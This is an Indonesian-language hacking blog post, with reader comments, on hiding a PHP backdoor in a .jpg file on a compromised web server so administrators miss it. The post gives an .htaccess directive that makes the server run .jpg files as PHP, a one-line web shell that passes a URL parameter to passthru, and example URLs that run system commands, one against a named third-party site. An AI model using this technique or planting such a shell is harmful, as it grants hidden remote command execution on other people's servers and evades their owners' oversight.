-=[ D4wFl1N ]=-: Menyembunyikan shell berekstensi .jpg atau .jpeg dengan .htaccess

17 April 2011

Menyembunyikan shell berekstensi .jpg atau .jpeg dengan .htaccess

Banyak orang yang beranggapan bahwa backdoor (BD) yang disembunyikan pada web server sebuah website sudah di rasa aman dan tidak mungkin diketahui oleh admin maupun orang lain. Tetapi pada kenyataannya semua shell yang berekstensi .php pada sebuah web server dapat begituh mudah diketahui oleh sang Admin dan akan langsung di delete. Namun tidak demikian hal nya jika kita menyembunyikan shell kita dengan ekstensi .jpg atau .jpeg.

OK langsung saja,....

tambahkan kode berikut pada file .htaccess jika filenya tidak ada maka buatlah :p

AddType application/x-httpd-php .jpg

lalu ambil sebuah gambar yang ber-ekstensi .jpeg atau .jpg lalu masukkan kode berikut pada gambar tadi

passthru($_GET['cmd']);
?>

dan upload satu direktori dengan file .htaccess

sekarang coba bukalah URL tempat file image tadi berada,
contoh :
http://example.com/images/logo.jpg?cmd=net%20user
sebagai contoh lain saya mengambil target yang dipinjamkan oleh Om Oghie
http://www.harvesthowl.org/test.jpg?cmd=dir

Referensi :
http://www.google.co.id
http://itsecuritylab.eu/

4 comments:

oGHie said...: keren tutornya kk; 17 April, 2011 09:42
D4wFl1N said...: @oGHie : makasih kaka udah mampir dan makasih juga buat shell nya :D; 17 April, 2011 17:45
Unknown said...: mantap gan ...sukses selalu ...
Nitip ya: http://peace-reggae.blogspot.com/; 07 November, 2011 07:03
Firman Hadi said...: mantap.; 06 October, 2020 19:06

-=[ D4wFl1N ]=-

Pages

17 April 2011

Menyembunyikan shell berekstensi .jpg atau .jpeg dengan .htaccess

4 comments:

Followers

Blog Archive

Partner Site

Entri Populer

Visitor